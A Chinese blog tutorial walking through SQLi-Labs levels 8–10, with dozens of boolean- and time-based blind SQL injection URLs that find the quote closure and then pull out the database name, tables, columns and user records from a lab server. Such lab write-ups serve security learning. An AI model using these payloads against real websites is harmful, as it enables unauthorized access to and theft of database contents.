SqliLab_Mysql_Injection详解_字符型注入(五)_时间盲注(8~10)

最新推荐文章于 2023-02-20 19:10:25 发布
最新推荐文章于 2023-02-20 19:10:25 发布
阅读量616 收藏
点赞数 2
分类专栏: # MYSQL注入学习 文章标签: 时间盲注 布尔盲注
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41260930/article/details/102683235
版权

文章目录

1. SqliLab_Mysql_Injection详解_字符型注入(五)
1.1. SQL注入_时间盲注
1.1.1. 原理

当在服务器后台关闭了返回页面的错误回显或过滤了某些关键字,返回的网页只会返回一种状态(无法通过传统的布尔盲注(true or false)来判断了),这时候就需要用到时间盲注了,时间盲注成功时,服务器会由于执行了构造语句中的sleep()函数,休眠一定的时间,再返回数据;通过观察浏览器客户端发送请求,到服务器返回页面的时间延迟,来判断sleep()函数之前的,构造语句的执行结果是否正确,从而判断出是否存在时间盲注,或者盲注payload返回结果是否等同于预期;

1.1.2. 常用的函数
  • if(1,2,3):如果语句1为True,则执行语句2,否则执行语句3;
  • sleep(x):执行时间延迟x秒;
  • ascii(char):将char转换为对应的ascii码值
  • substr(string,start,len):从string的start位开始截取len个字符;
  • Benchmark(x,1):执行表达式1,x次(会消耗CPU,慎用);

EG:

> if(ascii(substr(查询语句,start,1))=97,sleep(3),1);
  //ASCII查询语句执行成功时,执行sleep(3),休眠三秒;执行错误时,执行1;
2. SqliLab关卡(包含8,9,10)(图片占据空间太大,payload具体返回情况均写在每条payload下的注释中)
2.1. SqliLab-8(布尔盲注/时间盲注(单引号闭合)):
2.1.1. 初始界面

在这里插入图片描述

2.1.2. 判断注入点(关键步骤)

由初始界面显示知道,可以看到‘id’为输入参数,所以构造判断注入点链接;
尝试使用一般的单引号(’)闭合参数,由于之前遇到过没有使用闭合字符的例子,所以一开始先不使用闭合字符进行判断;
EG:

> http://192.168.1.104/sql/Less-8/?id=1 and 1=1 --+
  //服务器返回页面正确(预期正确),尝试用(and 1=2)进行构造;
---------------------------------------------------------------
> http://192.168.1.104/sql/Less-8/?id=1 and 1=2 --+
  //服务器返回页面正确(预期错误),尝试用(')代替()进行构造;
---------------------------------------------------------------
> http://192.168.1.104/sql/Less-8/?id=1' and 1=1 --+
  //服务器返回页面正确(预期正确),尝试用(and 1=2)进行构造;
---------------------------------------------------------------
> http://192.168.1.104/sql/Less-8/?id=1' and 1=2 --+
  //服务器返回页面错误(预期错误),判断出参数‘id’存在注入,闭合字符为【'】;

在这里插入图片描述
在这里插入图片描述
由此,判断出参数‘id’存在注入(or/xor一样),闭合字符为【’】;
EG:
判断服务器返回页面是否存在SQL语句报错信息提示;

> http://192.168.1.104/sql/Less-8/?id=1""" and 1=1 --+
  //服务器返回页面正确(预期错误提示),尝试用(“))代替(""")进行构造;
--------------------------------------------------------------
> http://192.168.1.104/sql/Less-8/?id=1") and 1=1 --+
  //服务器返回页面正确(预期错误提示),尝试用(“)))代替("))进行构造;
--------------------------------------------------------------
> http://192.168.1.104/sql/Less-8/?id=1")) and 1=1 --+
  //服务器返回页面正确(预期错误提示),尝试用()")代替(")))进行构造; 
--------------------------------------------------------------
> http://192.168.1.104/sql/Less-8/?id=1)" and 1=1 --+
  //服务器返回页面正确(预期错误提示),尝试用())")代替()")进行构造; 
--------------------------------------------------------------
> http://192.168.1.104/sql/Less-8/?id=1))" and 1=1 --+
  //服务器返回页面正确(预期错误提示),尝试用(^%?)代替())")进行构造; 
--------------------------------------------------------------
> http://192.168.1.104/sql/Less-8/?id=1^%? and 1=1 --+
  //服务器返回页面正确(预期错误提示),尝试用(...)代替(^%?)进行构造;
--------------------------------------------------------------
  ...

经过尝试,服务器返回页面不存在SQL语句报错信息提示;
再次判断是否存在时间注入,通过判断出的闭合字符(’)进行尝试;
EG:

> http://192.168.1.104/sql/Less-8/?id=1' and if(1=1,sleep(4),1) --+
  //服务器返回延迟为5秒(1秒查询,4秒休眠),尝试sleep(5);
---------------------------------------------------------------------
> http://192.168.1.104/sql/Less-8/?id=1' and if(1=1,sleep(5),1) --+
  //服务器返回延迟为6秒(1秒查询,5秒休眠),尝试sleep(7); 
---------------------------------------------------------------------
> http://192.168.1.104/sql/Less-8/?id=1' and if(1=1,sleep(7),1) --+
  //服务器返回延迟为8秒(1秒查询,7秒休眠),尝试sleep(9); 
---------------------------------------------------------------------
> http://192.168.1.104/sql/Less-8/?id=1' and if(1=1,sleep(9),1) --+
  //服务器返回延迟为10秒(1秒查询,9秒休眠),基本可以判断参数(id)存在时间注入;

在这里插入图片描述
在这里插入图片描述
经过测试,参数(id)存在时间注入;
在注入点判断过程中,可以发现,服务器在接受请求后,返回的页面存在无回显和无报错提示的情况,这时候如果再利用UNION联合查询法查看显位以及报错注入的方式就失效了,只能基于SQL语句的True or False进行盲注了(布尔盲注或者基于时间的盲注);

2.1.3. 收集信息

由于不存在服务器返回页面回显和报错情况,只能使用盲注的方式获取想要的信息;
EG:
布尔盲注(使用left(),length(),ascii(),substr()/substring()函数构造链接):

> http://192.168.1.104/sql/Less-8/?id=1' and left(version(),1)='5' --+
  //返回mysql版本的第一个字符,已查询到为(5);
----------------------------------------------------------------------------------
> http://192.168.1.104/sql/Less-8/?id=1' and ascii(substr(@@datadir,1,1))='71' --+
  //返回数据库安装路径的第一个字符的ASCII值,已查询到为(71),转换字符为(G);
----------------------------------------------------------------------------------
  ...

EG:
时间盲注(使用left(),length(),ascii(),substr()/substring(),if(),sleep()函数构造链接):

> http://192.168.1.104/sql/Less-8/?id=1' and if(left(version(),1)='5',sleep(5),1) --+
  //返回mysql版本的第一个字符,已查询到为(5)(1秒查询,5秒休眠);
-------------------------------------------------------------------------------------------------
> http://192.168.1.104/sql/Less-8/?id=1' and if(ascii(substr(@@datadir,1,1))='71',sleep(5),1) --+
  //返回数据库安装路径的第一个字符的ASCII值,已查询到为(71),转换字符为(G)(1秒查询,5秒休眠);
-------------------------------------------------------------------------------------------------

在这里插入图片描述
查询到一些数据库信息如,数据库版本,数据库安装路径等;

2.1.4. 求当前数据库名(字符或者ASCII值)

布尔盲注(使用left()函数构造链接):
EG:

> http://192.168.1.104/sql/Less-8/?id=1' and left(database(),1)='s'--+
  //返回当前数据库名的第一个字符,已查询到为(s);
----------------------------------------------------------------------
  ...

时间盲注(使用if(),ascii(),substr()/substring(),sleep()函数构造链接):
EG:

> http://192.168.1.104/sql/Less-8/?id=1' and if(ascii(substr(database(),1,1))='115',sleep(5),1)--+
  //返回当前数据库名的第一个字符的ASCII值,已查询到为(115),转换字符为(s)(1秒查询,5秒休眠);
--------------------------------------------------------------------------------------------------
  ...

在这里插入图片描述
查询到当前数据库名的值为(security);

2.1.5. 求当前数据库中表的数量

EG:
布尔盲注(使用count()函数构造链接):

> http://192.168.1.104/sql/Less-8/?id=1' and (select count(table_name) from information_schema.tables 
  where table_schema=database())=4--+
  //返回当前数据库中表的数量,已查询到为(4);

EG:
时间盲注(使用if(),count(),sleep()函数构造链接):

> http://192.168.1.104/sql/Less-8/?id=1' and if((select count(table_name) from information_schema.tables 
  where table_schema=database())=4,sleep(5),1)--+
  //返回当前数据库中表的数量,已查询到为(4)(1秒查询,5秒休眠);

在这里插入图片描述
当前数据库中表的数量为(4);

2.1.6. 求当前数据库中的各个表的长度

EG:
布尔盲注(使用length()函数构造链接):

> http://192.168.1.104/sql/Less-8/?id=1' and length((select table_name from information_schema.tables 
  where table_schema=database() limit 0,1))=6 --+
  // 返回当前数据库中的第一个表的长度,已查询到为(6);
-----------------------------------------------------------------------------------------------------
  ...

EG:
时间盲注(使用if(),length(),sleep()函数构造链接):

> http://192.168.1.104/sql/Less-8/?id=1' and if(length((select table_name from information_schema.tables 
  where table_schema=database() limit 0,1))=6,sleep(5),1) --+
  // 返回当前数据库中的第一个表的长度,已查询到为(6)(1秒查询,5秒休眠);
--------------------------------------------------------------------------------------------------------
  ...

在这里插入图片描述
查询到当前数据库‘security’中的各个表的长度依次为(6,8,7,5);

2.1.7. 求当前数据库中的各个表的表名(字符或者ASCII值)

EG:
布尔盲注(使用left()函数构造链接):

> http://192.168.1.104/sql/Less-8/?id=1' and left((select table_name from information_schema.tables 
  where table_schema=database() limit 0,1),1)='e' --+ 
  //返回当前数据库中的第一个表的表名的第一个字符;已查询到为(e);
---------------------------------------------------------------------------------------------------
  ...

EG:
时间盲注(使用if(),ascii(),substr()/substring(),sleep()函数构造链接):

> http://192.168.1.104/sql/Less-8/?id=1' and if(ascii(substr((select table_name from information_schema.tables 
  where table_schema=database() limit 0,1),1,1))=101,sleep(5),1) --+
--------------------------------------------------------------------------------------------------------------
  //返回当前数据库中的第一个表的表名的第一个字符的ASCII值;已查询到为(101)转换字符为(e)(1秒查询,5秒休眠);
  ...

在这里插入图片描述
查询到‘security’数据库四个表的表名分别为(emails,referers,uagents,users);

2.1.8. 求‘users’表中的字段数量

EG:
布尔盲注(使用count()函数构造链接):

> http://192.168.1.104/sql/Less-8/?id=1' and (select count(column_name) from information_schema.columns 
  where table_name='users')=3--+
  //返回‘users’表中的字段数量,已查询到为(3);

EG:
时间盲注(使用if(),count(),sleep()函数构造链接):

> http://192.168.1.104/sql/Less-8/?id=1' and if((select count(column_name) from information_schema.columns 
  where table_name='users')=3,sleep(5),1) --+
  //返回‘users’表中的字段数量,已查询到为(3)(1秒查询,5秒休眠);

在这里插入图片描述
查询到users’表中的字段数量为(3);

2.1.9. 求‘users’表中的各个字段的长度

EG:
布尔盲注(使用length()函数构造链接):

> http://192.168.1.104/sql/Less-8/?id=1' and length((select column_name from information_schema.columns 
  where table_name='users' limit 0,1))=2 --+
  //返回‘users’表的第一个字段的长度,已查询到为(2);
-------------------------------------------------------------------------------------------------------
  ...

EG:
时间盲注(使用if(),length(),sleep()函数构造链接):

> http://192.168.1.104/sql/Less-8/?id=1' and if(length((select column_name from information_schema.columns 
  where table_name='users' limit 0,1))=2,sleep(5),1) --+
  //返回‘users’表的第一个字段的长度,已查询到为(2)(1秒查询,5秒休眠);
---------------------------------------------------------------------------------------------------------
  ...

在这里插入图片描述
查询到‘users’表中的各个字段的长度依次为(2,8,8);

2.1.10. 求‘users’表中的各个字段的值(字符或者ASCII值)

EG:
布尔盲注(使用left()函数构造链接):

> http://192.168.1.104/sql/Less-8/?id=1' and left((select column_name from information_schema.columns 
  where table_name='users' limit 0,1),1)='i' --+  
  //返回‘users’表的第一个字段的第一个字符,已查询到为(i);
-----------------------------------------------------------------------------------------------------
  ...

EG:
时间盲注(使用if(),ascii(),substr(),sleep()函数构造链接):

> http://192.168.1.104/sql/Less-8/?id=1' and if(ascii(substr((select column_name from information_schema.columns 
  where table_name='users' limit 0,1),1,1))=105,sleep(5),1) --+  
  //返回‘users’表的第一个字段的第一个字符的ASCII值,已查询到为(105),转换字符为(i)(1秒查询,5秒休眠);
----------------------------------------------------------------------------------------------------------------
  ...

在这里插入图片描述
查询到‘users’表中的三个字段的值依次为(id,username,password);

2.1.11. 求‘users’表中的各个字段的值的信息(字符或者ASCII值)

求‘users’表中的第一个字段‘id’的第一条信息;
EG:
布尔盲注(使用ascii(),substr()函数构造链接):

> http://192.168.1.104/sql/Less-8/?id=1' and ascii(substr((select id from users limit 0,1),1,1))=49--+
  //返回‘users’表的第一个字段‘id’的第一条信息的第一个字符的ASCII值,已查询到为(49),转换为字符为(1);
------------------------------------------------------------------------------------------------------
  ...

EG:
时间盲注(使用if(),ascii(),substr(),sleep()函数构造链接):

> http://192.168.1.104/sql/Less-8/?id=1' and if(ascii(substr((select id from users limit 0,1),1,1))=49,sleep(5),1)--+
  //返回‘users’表的第一个字段‘id’的第一条信息的第一个字符的ASCII值,已查询到为(49),转换为字符为(1)(1秒查询,5秒休眠);
---------------------------------------------------------------------------------------------------------------------
  ...

在这里插入图片描述
同理对于字段(username,password)的值信息也是采取一样的方式进行查询,查询其他的值也是同上面的方法一致;到此,SQL注入(布尔盲注/时间盲注)基础流程差不多就结束了,所需要的信息(数据库信息,表字段值等)差不多都已经搜集到了,SqliLab-8结束;

2.2. SqliLab-9(时间盲注(单引号闭合)):
2.2.1. 初始界面

在这里插入图片描述

2.2.2. 判断注入点(关键步骤)

由初始界面显示知道,可以看到‘id’为输入参数,所以构造判断注入点链接;
尝试使用一般的单引号(’)闭合参数,由于之前遇到过没有使用闭合字符的例子,所以一开始先不使用闭合字符进行判断;
EG:

> http://192.168.1.104/sql/Less-9/?id=1 and 1=1 --+ 
  //服务器返回页面正确(预期正确),尝试用(and 1=2)进行构造;
--------------------------------------------------------------
> http://192.168.1.104/sql/Less-9/?id=1 and 1=2 --+
  //服务器返回页面正确(预期错误),尝试用(')代替()进行构造;
--------------------------------------------------------------
> http://192.168.1.104/sql/Less-9/?id=1' and 1=1 --+
  //服务器返回页面正确(预期正确),尝试用(and 1=2)进行构造;
--------------------------------------------------------------
> http://192.168.1.104/sql/Less-9/?id=1' and 1=2 --+
  //服务器返回页面正确(预期错误),尝试用(")代替(')进行构造; 
--------------------------------------------------------------
> http://192.168.1.104/sql/Less-9/?id=1" and 1=1 --+
  //服务器返回页面正确(预期正确),尝试用(and 1=2)进行构造;
--------------------------------------------------------------
> http://192.168.1.104/sql/Less-9/?id=1" and 1=2 --+
  //服务器返回页面正确(预期错误),尝试用())代替(")进行构造;
> http://192.168.1.104/sql/Less-9/?id=1) and 1=1 --+ 
  //服务器返回页面正确(预期正确),尝试用(and 1=2)进行构造;
--------------------------------------------------------------
> http://192.168.1.104/sql/Less-9/?id=1) and 1=2 --+ 
  //服务器返回页面正确(预期错误),尝试用('))代替())进行构造;
--------------------------------------------------------------
> http://192.168.1.104/sql/Less-9/?id=1') and 1=1 --+ 
  //服务器返回页面正确(预期正确),尝试用(and 1=2)进行构造;
--------------------------------------------------------------
> http://192.168.1.104/sql/Less-9/?id=1') and 1=2 --+ 
  //服务器返回页面正确(预期错误),尝试用("))代替('))进行构造;
--------------------------------------------------------------
> http://192.168.1.104/sql/Less-9/?id=1") and 1=1 --+
  //服务器返回页面正确(预期正确),尝试用(and 1=2)进行构造;
--------------------------------------------------------------
> http://192.168.1.104/sql/Less-9/?id=1") and 1=2 --+
  //服务器返回页面正确(预期错误),经过尝试发现,所有尝试的结果,服务器返
  //回的页面都是正确的, 考虑返回的页面可能只有一种返回结果,尝试是否存在
  //时间注入存在,用符号字符进行尝试(故意构造错误的语句,查看服务器返回页
  //面的情况),用(&*%^)代替("))进行构造;
--------------------------------------------------------------
> http://192.168.1.104/sql/Less-9/?id=1&*%^ and 1=1--+ 
  //服务器返回页面无改变(预期无改变),尝试用(@@$&!)代替(&*%^)进行构造;
---------------------------------------------------------------------
> http://192.168.1.104/sql/Less-9/?id=1@@$&!  and 1=1--+ 
  //服务器返回页面无改变(预期无改变),尝试用(~~^@#)代替(@@$&!)进行构造;
---------------------------------------------------------------------
> http://192.168.1.104/sql/Less-9/?id=1~~^@#  and 1=1--+
  //服务器返回页面无改变(预期无改变), 考虑对是否存在时间注入点,尝试用sleep()
  //函数进行构造;
> http://192.168.1.104/sql/Less-9/?id=1 and if(1=1,sleep(4),1) --+
  //服务器返回延迟为1秒,尝试用(')代替()进行构造;
---------------------------------------------------------------------
> http://192.168.1.104/sql/Less-9/?id=1' and if(1=1,sleep(4),1) --+
  //服务器返回延迟为5秒(1秒查询,4秒休眠),尝试sleep(5);
---------------------------------------------------------------------
> http://192.168.1.104/sql/Less-9/?id=1' and if(1=1,sleep(5),1) --+
  //服务器返回延迟为6秒(1秒查询,5秒休眠),尝试sleep(7); 
---------------------------------------------------------------------
> http://192.168.1.104/sql/Less-9/?id=1' and if(1=1,sleep(7),1) --+
  //服务器返回延迟为8秒(1秒查询,7秒休眠),尝试sleep(9); 
---------------------------------------------------------------------
> http://192.168.1.104/sql/Less-9/?id=1' and if(1=1,sleep(9),1) --+
  //服务器返回延迟为10秒(1秒查询,9秒休眠),基本可以判断参数(id)存在时间注入,
  //闭合字符为(');
---------------------------------------------------------------------
  ...

经过尝试知道,参数id存在时间注入,且闭合字符为(’);
在这里插入图片描述
知道了注入点以及可以采用的注入方式后,就很好构造payload去获取想要获取的信息了,这里采用时间盲注的策略;
收集信息
EG:
使用left(),length(),ascii(),substr()/substring(),if(),sleep()函数构造链接:

> http://192.168.1.104/sql/Less-9/?id=1' and if(left(version(),1)='5',sleep(5),1) --+
  //返回mysql版本的第一个字符,已查询到为(5)(1秒查询,5秒休眠);
-------------------------------------------------------------------------------------------------
> http://192.168.1.104/sql/Less-9/?id=1' and if(ascii(substr(@@datadir,1,1))='71',sleep(5),1) --+
  //返回数据库安装路径的第一个字符的ASCII值,已查询到为(71),转换字符为(G)(1秒查询,5秒休眠);
-------------------------------------------------------------------------------------------------

在这里插入图片描述
查询到一些数据库信息如,数据库版本,数据库安装路径等;

2.2.3. 求当前数据库名(字符或者ASCII值)

EG:
使用if(),ascii(),substr()/substring(),sleep()函数构造链接:

> http://192.168.1.104/sql/Less-9/?id=1' and if(ascii(substr(database(),1,1))='115',sleep(5),1)--+
  //返回当前数据库名的第一个字符的ASCII值,已查询到为(115),转换字符为(s)(1秒查询,5秒休眠);
--------------------------------------------------------------------------------------------------
  ...

在这里插入图片描述
查询到当前数据库名的值为(security);

2.2.4. 求当前数据库中表的数量

EG:
使用if(),count(),sleep()函数构造链接:

> http://192.168.1.104/sql/Less-9/?id=1' and if((select count(table_name) from information_schema.tables 
  where table_schema=database())=4,sleep(5),1)--+
  //返回当前数据库中表的数量,已查询到为(4)(1秒查询,5秒休眠);

在这里插入图片描述
当前数据库中表的数量为(4);

2.2.5. 求当前数据库中的各个表的长度

EG:
使用if(),length(),sleep()函数构造链接:

> http://192.168.1.104/sql/Less-9/?id=1' and if(length((select table_name from information_schema.tables 
  where table_schema=database() limit 0,1))=6,sleep(5),1) --+
  // 返回当前数据库中的第一个表的长度,已查询到为(6)(1秒查询,5秒休眠);
--------------------------------------------------------------------------------------------------------
  ...

在这里插入图片描述
查询到当前数据库‘security’中的各个表的长度依次为(6,8,7,5);

2.2.6. 求当前数据库中的各个表的表名(字符或者ASCII值)

EG:
使用if(),ascii(),substr()/substring(),sleep()函数构造链接:

> http://192.168.1.104/sql/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables 
  where table_schema=database() limit 0,1),1,1))=101,sleep(5),1) --+
--------------------------------------------------------------------------------------------------------------
  //返回当前数据库中的第一个表的表名的第一个字符的ASCII值;已查询到为(101)转换字符为(e)(1秒查询,5秒休眠);
  ...

在这里插入图片描述
查询到‘security’数据库四个表的表名分别为(emails,referers,uagents,users);

2.2.7. 求‘users’表中的字段数量

EG:
使用if(),count(),sleep()函数构造链接:

> http://192.168.1.104/sql/Less-9/?id=1' and if((select count(column_name) from information_schema.columns 
  where table_name='users')=3,sleep(5),1) --+
  //返回‘users’表中的字段数量,已查询到为(3)(1秒查询,5秒休眠);

在这里插入图片描述
查询到users’表中的字段数量为(3);

2.2.8. 求‘users’表中的各个字段的长度

EG:
时间盲注(使用if(),length(),sleep()函数构造链接):

> http://192.168.1.104/sql/Less-9/?id=1' and if(length((select column_name from information_schema.columns 
  where table_name='users' limit 0,1))=2,sleep(5),1) --+
  //返回‘users’表的第一个字段的长度,已查询到为(2)(1秒查询,5秒休眠);
----------------------------------------------------------------------------------------------------------
  ...

在这里插入图片描述
查询到‘users’表中的各个字段的长度依次为(2,8,8);

2.2.9. 求‘users’表中的各个字段的值(字符或者ASCII值)

EG:
使用if(),ascii(),substr(),sleep()函数构造链接:

> http://192.168.1.104/sql/Less-9/?id=1' and if(ascii(substr((select column_name from information_schema.columns 
  where table_name='users' limit 0,1),1,1))=105,sleep(5),1) --+  
  //返回‘users’表的第一个字段的第一个字符的ASCII值,已查询到为(105),转换字符为(i)(1秒查询,5秒休眠);
----------------------------------------------------------------------------------------------------------------
  ...

在这里插入图片描述
查询到‘users’表中的三个字段的值依次为(id,username,password);

2.2.10. 求‘users’表中的各个字段的值的信息(字符或者ASCII值)

求‘users’表中的第一个字段‘id’的第一条信息;
EG:
使用if(),ascii(),substr(),sleep()函数构造链接:

> http://192.168.1.104/sql/Less-9/?id=1' and if(ascii(substr((select id from users limit 0,1),1,1))=49,sleep(5),1)--+
  //返回‘users’表的第一个字段‘id’的第一条信息的第一个字符的ASCII值,已查询到为(49),转换为字符为(1)(1秒查询,5秒休眠);
 --------------------------------------------------------------------------------------------------------------------
  ...

在这里插入图片描述
同理对于字段(username,password)的值信息也是采取一样的方式进行查询,查询其他的值也是同上面的方法一致;到此,时间盲注的基础流程差不多就结束了,所需要的信息(数据库信息,表字段值等)差不多都已经搜集到了,SqliLab-9结束;

2.3. SqliLab-10(时间盲注(双引号闭合)):
2.3.1. 初始界面

在这里插入图片描述

2.3.2. 判断注入点(关键步骤)

由初始界面显示知道,可以看到‘id’为输入参数,所以构造判断注入点链接;
尝试使用一般的单引号(’)闭合参数,由于之前遇到过没有使用闭合字符的例子,所以一开始先不使用闭合字符进行判断;
EG:

> http://192.168.1.104/sql/Less-10/?id=1 and 1=1 --+ 
  //服务器返回页面正确(预期正确),尝试用(and 1=2)进行构造;
--------------------------------------------------------------
> http://192.168.1.104/sql/Less-10/?id=1 and 1=2 --+
  //服务器返回页面正确(预期错误),尝试用(')代替()进行构造;
--------------------------------------------------------------
> http://192.168.1.104/sql/Less-10/?id=1' and 1=1 --+
  //服务器返回页面正确(预期正确),尝试用(and 1=2)进行构造;
--------------------------------------------------------------
> http://192.168.1.104/sql/Less-10/?id=1' and 1=2 --+
  //服务器返回页面正确(预期错误),尝试用(")代替(')进行构造; 
--------------------------------------------------------------
> http://192.168.1.104/sql/Less-10/?id=1" and 1=1 --+
  //服务器返回页面正确(预期正确),尝试用(and 1=2)进行构造;
--------------------------------------------------------------
> http://192.168.1.104/sql/Less-10/?id=1" and 1=2 --+
  //服务器返回页面正确(预期错误),尝试用())代替(")进行构造;
> http://192.168.1.104/sql/Less-10/?id=1) and 1=1 --+ 
  //服务器返回页面正确(预期正确),尝试用(and 1=2)进行构造;
--------------------------------------------------------------
> http://192.168.1.104/sql/Less-10/?id=1) and 1=2 --+ 
  //服务器返回页面正确(预期错误),尝试用('))代替())进行构造;
--------------------------------------------------------------
> http://192.168.1.104/sql/Less-10/?id=1') and 1=1 --+ 
  //服务器返回页面正确(预期正确),尝试用(and 1=2)进行构造;
--------------------------------------------------------------
> http://192.168.1.104/sql/Less-10/?id=1') and 1=2 --+ 
  //服务器返回页面正确(预期错误),尝试用("))代替('))进行构造;
--------------------------------------------------------------
> http://192.168.1.104/sql/Less-10/?id=1") and 1=1 --+
  //服务器返回页面正确(预期正确),尝试用(and 1=2)进行构造;
--------------------------------------------------------------
> http://192.168.1.104/sql/Less-10/?id=1") and 1=2 --+
  //服务器返回页面正确(预期错误),经过尝试发现,所有尝试的结果,服务器返
  //回的页面都是正确的, 考虑返回的页面可能只有一种返回结果,尝试是否存在
  //时间注入存在,用符号字符进行尝试(故意构造错误的语句,查看服务器返回页
  //面的情况),用(&*%^)代替("))进行构造;
--------------------------------------------------------------
> http://192.168.1.104/sql/Less-10/?id=1&*%^ and 1=1--+ 
  //服务器返回页面无改变(预期无改变),尝试用(@@$&!)代替(&*%^)进行构造;
---------------------------------------------------------------------
> http://192.168.1.104/sql/Less-10/?id=1@@$&!  and 1=1--+ 
  //服务器返回页面无改变(预期无改变),尝试用(~~^@#)代替(@@$&!)进行构造;
---------------------------------------------------------------------
> http://192.168.1.104/sql/Less-10/?id=1~~^@#  and 1=1--+
  //服务器返回页面无改变(预期无改变), 考虑对是否存在时间注入点,尝试用sleep()
  //函数进行构造;
> http://192.168.1.104/sql/Less-10/?id=1 and if(1=1,sleep(4),1) --+
  //服务器返回延迟为1秒,尝试用(')代替()进行构造;
---------------------------------------------------------------------
> http://192.168.1.104/sql/Less-10/?id=1' and if(1=1,sleep(4),1) --+
  //服务器返回延迟为1秒,尝试用(")代替(')进行构造;
---------------------------------------------------------------------
> http://192.168.1.104/sql/Less-10/?id=1" and if(1=1,sleep(4),1) --+
  //服务器返回延迟为5秒(1秒查询,4秒休眠),尝试sleep(5);
---------------------------------------------------------------------
> http://192.168.1.104/sql/Less-10/?id=1" and if(1=1,sleep(5),1) --+
  //服务器返回延迟为6秒(1秒查询,5秒休眠),尝试sleep(7); 
---------------------------------------------------------------------
> http://192.168.1.104/sql/Less-10/?id=1" and if(1=1,sleep(7),1) --+
  //服务器返回延迟为8秒(1秒查询,7秒休眠),尝试sleep(9); 
---------------------------------------------------------------------
> http://192.168.1.104/sql/Less-10/?id=1" and if(1=1,sleep(9),1) --+
  //服务器返回延迟为10秒(1秒查询,9秒休眠),基本可以判断参数(id)存在时间注入,
  //闭合字符为(');
---------------------------------------------------------------------
  ...

在这里插入图片描述
经过尝试知道,参数id存在时间注入,且闭合字符为(");
知道了注入点以及可以采用的注入方式后,就很好构造payload去获取想要获取的信息了,这里采用时间盲注的策略,具体流程和SqliLab-9的一模一样(只是payload的URL链接(9转变为10)和参数的字符闭合方式发生变化('转变为")),SqliLab-10结束;

3. 总结

通过多次对练习题的注入的经历,大概也简单了解了一些知识,如最开始的注入点的判断是非常的重要,确定了注入点,才能根据具体的条件选择快捷的注入方式获取数据库信息,同时,也知道在对字符型注入的注入点的判断是十分耗费时间的(闭合字符的组合方式以及根据服务器返回页面的情况调整判断payload等),可以考虑自行编写脚本进行注入点尝试,基本上注入点判断好后,后续的注入方式能很快的选择,以及payload都能很快构造出来了;基于时间的盲注,可以用于一些服务器返回页面没有差异的情况(比如登录界面,采集登录用户信息的模块页面,差异页面不是由URL中的SQL语句来决定的等)。

[如有错误,请指出,拜托了<( _ _ )> !!!]

Tes789123456
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA------SQL Injection (Blind)(SQL盲注
m0_65712192的博客
12-09 2658
DVWA------SQL Injection (Blind)(SQL盲注
DVWA盲注详解
qq_45788625的博客
04-18 6488
low等级DVWA盲注详解
(手工)【sqli-labs28、28a】字符注入盲注、过滤
07-14 1057
SQL-字符注入盲注、过滤】
mysql injection_MySQL SQL Injection(注入)
weixin_42474164的博客
01-20 257
如果通过网页接收用户输入,而后再把这些数据插入到数据库中,那么你可能就会碰到 SQL 注入式攻击。本节简要介绍如何防范这种攻击,确保脚本和 MySQL 语句的安全性。注入式攻击往往发生在要求用户输入时,比如说要求他们输入自己的名字,但是他们却输入了一段 MySQL 语句,不知不觉地运行在数据库上。永远不要相信用户所提供的数据,只有在验证无误后,才能去处理数据。通常,利用模式匹配来实现。在下面这个范...
mysql-injection整理
criminal_1的博客
02-20 175
sql注入整理
MySQL拼接字符串函数GROUP_CONCAT详解
09-08
本文给大家详细讲解了MySQL的拼接字符串函数GROUP_CONCAT的几种使用方法以及详细示例,有需要的小伙伴可以参考下
Mysql-blind-inject.zip_Blind sql injection_SQL inject_blind_blin
09-24
SQL注入MYSQL数据库的盲注手法进行了一些简要的说明
Mysql注入中的outfile、dumpfile、load_file函数详解
09-09
主要介绍了Mysql注入中的outfile、dumpfile、load_file,需要的朋友可以参考下
fetchAll()与mysql_fetch_array()的区别详解
10-27
本篇文章是对fetchAll()与mysql_fetch_array()的区别进行了详细的分析介绍,需要的朋友参考下
MySQL 5.6下table_open_cache参数优化合理配置详解
09-09
主要介绍了MySQL 5.6下table_open_cache参数合理配置详解,需要的朋友可以参考下
SQL Injection with MySQL 注入分析
09-14
本文作者:angel文章性质:原创 国内能看到php+Mysql注入的文章可能比较少,但是如果关注各种WEB程序的漏洞,就可以发现,其实这些漏洞的文章其实就是一个例子。
mysql injection_MySQL SQL Injection
weixin_39643338的博客
01-20 58
如果通过网页接收用户输入,而后再把这些数据插入到数据库中,那么你可能就会碰到 SQL 注入式攻击。本节简要介绍如何防范这种攻击,确保脚本和 MySQL 语句的安全性。注入式攻击往往发生在要求用户输入时,比如说要求他们输入自己的名字,但是他们却输入了一段 MySQL 语句,不知不觉地运行在数据库上。永远不要相信用户所提供的数据,只有在验证无误后,才能去处理数据。通常,利用模式匹配来实现。在下面这个范...
SQL Injection with MySQL
weixin_30849403的博客
05-25 274
本文作者:angel 文章性质:原创 发布日期:2004-09-16本文已经发表在《黑客防线》7月刊,转载请注明。由于写了很久,随着技术的进步,本人也发现该文里有不少错误和罗嗦的地方。请各位高手看了不要笑。本文写于《AdvancedSQLInjectionwithMySQL》之前一个月。 声明 本文仅用于教学目的,如果因为本文造成的攻击后果本人概不负责,本文所有代码均为本人所写,所有数据均...
暑期练习web23:sqli lab关 双注入GET单引号字符注入----基于bool的手工盲注
qq_41618162的博客
08-24 1246
如果所查询的用户id在数据库中,可以发现页面显示”You are in”,而不像前4关那样会显示出具体的账号密码 而如果输入的查询语句不存在,则什么也不会返回 这里普及一下盲注时的常用函数 1.mid()函数 mid(striing,start,length) string(必需)规定要返回其中一部分的字符串。 start(必需)规定开始位置(起始值是 1)。 length(...
浅谈盲注中的基于时间布尔注入方法
热门推荐
pygain的博客
11-08 2万+
SQL显错注入已经被用烂了像这种漏洞,漏洞批量发现工具找一找,sqlmap跑一跑。 今天讲的是在我们的命令被带入数据库查询语句但是却什么都没有返回的情况我们该怎么办。例如应用程序就会返回一个“通用的”的页面,或者重定向一个通用页面(可能为网站首页)。这时,我们之前学习的SQL注入办法就无法使用了。 盲注,即在SQL注入过程中,SQL语句执行选择后,选择的数据不能回显到前端,我们需要使用一些特殊的方法进行判断或尝试,这个过程称为盲注
SQL报错盲注教程(原理全剖析)
Pz_mstr's Blog
08-21 1万+
深入分析基于报错的sql盲注原理,解密“公式”的奥秘
SQL注入时间盲注 和 报错注入sql-lab第一关为例)
_Co1a
12-22 780
